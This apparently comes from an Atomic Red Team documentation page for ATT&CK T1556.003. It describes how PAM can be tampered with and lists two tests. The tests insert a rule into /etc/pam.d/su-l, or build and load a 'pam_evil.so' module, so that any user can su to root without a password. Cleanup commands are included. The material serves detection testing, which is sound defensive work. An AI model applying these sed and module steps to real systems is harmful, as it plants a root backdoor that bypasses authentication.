Try it using Invoke-Atomic

Modify Authentication Process: Pluggable Authentication Modules

Description from ATT&CK

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM) https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Malicious PAM rule

Inserts a rule into a PAM config and then tests it.

Upon successful execution, this test will insert a rule that allows every user to su to root without a password.

Supported Platforms: linux

auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c

Inputs:

Name Description Type Default Value
path_to_pam_conf PAM config file to modify. String /etc/pam.d/su-l
pam_rule Rule to add to the PAM config. String auth sufficient pam_succeed_if.so uid >= 0
index Index where the rule is inserted. Integer 1

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}

Cleanup Commands:

1
2
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}

Atomic Test #2 - Malicious PAM module

Creates a PAM module, inserts a rule to use it, and then tests it.

Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.

Supported Platforms: linux

auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326

Inputs:

Name Description Type Default Value
path_to_pam_conf PAM config file to modify. String /etc/pam.d/su-l
pam_rule Rule to add to the PAM config. String auth sufficient /tmp/pam_evil.so
index Index where the rule is inserted. Integer 1
path_to_pam_module_source Path to PAM module source code. Path PathToAtomicsFolder/T1556.003/src/pam_evil.c
path_to_pam_module Path to PAM module object Path /tmp/pam_evil.so

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}

Cleanup Commands:

1
2
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}

Dependencies: Run with sh!

Description: The PAM development library must be installed to build the PAM module

Check Prereq Commands:

1
2
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi

Description: The PAM module must exist on disk at specified location (#{path_to_pam_module})

Check Prereq Commands:

1
2
if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}

source